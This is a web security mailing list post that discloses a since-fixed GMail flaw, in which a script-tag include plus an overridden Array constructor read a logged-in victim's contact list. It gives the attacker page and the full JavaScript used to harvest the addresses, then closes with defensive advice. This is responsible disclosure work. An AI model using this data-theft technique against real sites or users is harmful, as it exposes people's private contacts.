[WEB SECURITY] Advanced Web Attack Techniques using GMail

[Jeremiah Grossman <jeremiah@xxxxxxxxxxxxxxx>]

A few months ago, I discovered a vulnerability in GMail where it  
became trivial to compromise someone's email contact list. I  
demonstrated the issue to a friend at Google by emailing his GMail  
account with simple link. Upon clicking the link and viewing the  
page, no XSS required, your contacts were displayed on screen (see  
screenshot). From there the email addresses could be easily stolen.  
Imagine if a spammer stumbled across this!

The issue was fixed within a few days, but the reason this particular  
vulnerability was interesting is the exploit techniques are a bit  
different than normally discussed. Also, I've been seeing the  
scenario described below increasingly often in websites. Those  
interested in browser security and AJAX development should take note.


Attack Details:
Assumes some knowledge of Cross-Site Request Forgeries, but with a  
slight variation.

1) Email a GMail account a link and click.
example:  http://foo/index.html


2) HTML of  http://foo/index.html
The single line of HTML below forces the web browser to automatically  
send an off-domain HTTP request to GMail. If the victim is logged-in 
(obviously the case when you email a GMail account), the session  
cookies will be sent along with the request, and the response  
contains the contact list. The URL was predictable across all users.

Page URL:  http://foo/index.html

<script src="http://mail.google.com/mail/?_url_scrubbed_";></script>


3) Sample content of http://mail.google.com/mail/?_url_scrubbed

The JavaScript line below contains an unreferenced array constant  
with your contact list of email addresses.

[["ct","Your Name","foo@xxxxxxxxx"], ["ct","Another  
Name","bar@xxxxxxxxx"] ]

GMail normally sends an XmlHttpRequest (XHR) to get this data on the  
fly where its then eval'ed in the browser and assigned to a variable.  
However in our case, the constant is loaded into JavaScript space on  
(http://foo/index.html) using a script tag, so its never assigned to  
a variable. This means accessing the data requires something more.


4) Accessing the contact list

When JavaScript parses and interprets the unreferenced array the  
Array constructor is called. Its possible to overwrite the internal  
Array constructor with our own to access the contact list. The new  
Array constructor uses a setters to trigger events, then parses out  
the data we want, and prints the data to screen.


var table = document.createElement('table');
table.id = 'content';
table.cellPadding = 3;
table.cellSpacing = 1;
table.border = 0;
		
function Array() {
	var obj = this;
	var ind = 0;
	var getNext;
	getNext = function(x) {
		obj[ind++] setter = getNext;
				
		if(x) {
			var str = x.toString();
			if ((str != 'ct') && (typeof x != 'object') && (str.match(/@/))) {
				var row = table.insertRow(-1);
				var td = row.insertCell(-1);
				td.innerHTML = str;
			}
		}
	};
	this[ind++] setter = getNext;
}

function readGMail() {
	document.body.appendChild(table);
}


<body onload="readGMail()">



Moral of the Story:

    - Don't put sensitive data in pure JavaScript files. Wrap HTML  
tags around the data to protect it from script tags.
    - If JavaScript files must contain sensitive information, make  
the URL unpredictable. And/Or...
    - Make sure the file cannot be accessed by anything with an off- 
domain referer.




Regards,

Jeremiah Grossman
Founder and CTO, WhiteHat Security, Inc.
www.whitehatsec.com



P.S.
From my experience Google is extremely responsive in handling  
reported issues.



---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/